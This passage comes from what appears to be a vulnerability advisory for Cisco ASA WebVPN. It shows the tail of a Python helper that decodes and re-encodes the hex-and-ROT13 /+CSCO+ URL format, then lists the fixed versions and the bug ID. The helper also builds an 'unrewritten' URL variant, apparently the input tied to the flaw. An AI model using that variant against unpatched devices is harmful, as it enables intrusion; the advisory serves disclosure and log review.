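    flag = int(m.group(1), 16)
    url = rot13(bytes.fromhex(m.group(2)).decode("ascii"))
    return flag, url


def decode_browse_target(path_param: str) -> str:
    """Decode the path= value of /+CSCOE+/files/browse.html (scheme://hex(rot13(host)))."""
    scheme, _, hexhost = unquote(path_param).partition("://")
    return f"{scheme}://{rot13(bytes.fromhex(hexhost).decode('ascii'))}"


if __name__ == "__main__":
    # Both values are the ones quoted in the advisory.
    page_path = "/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/"
    flag, url = decode_webvpn_target(page_path)
    print(f"flag={flag:02X} url={url}")
    print("unrewritten variant:", encode_webvpn_target(url, flag=0x01))
    print(decode_browse_target("ftp%3A%2F%2F7367632e726b6e7a6379722e70627a"))
```

Note that the advisory's sample path decodes to an https URL, which is why the prose above names https://www.trustwave.com; the file-browser path decodes to ftp.example.com. The decoder is also what a reviewer of Web VPN access logs would use to turn /+CSCO+ paths back into the hosts users actually reached.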

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80709.

CVSS Score: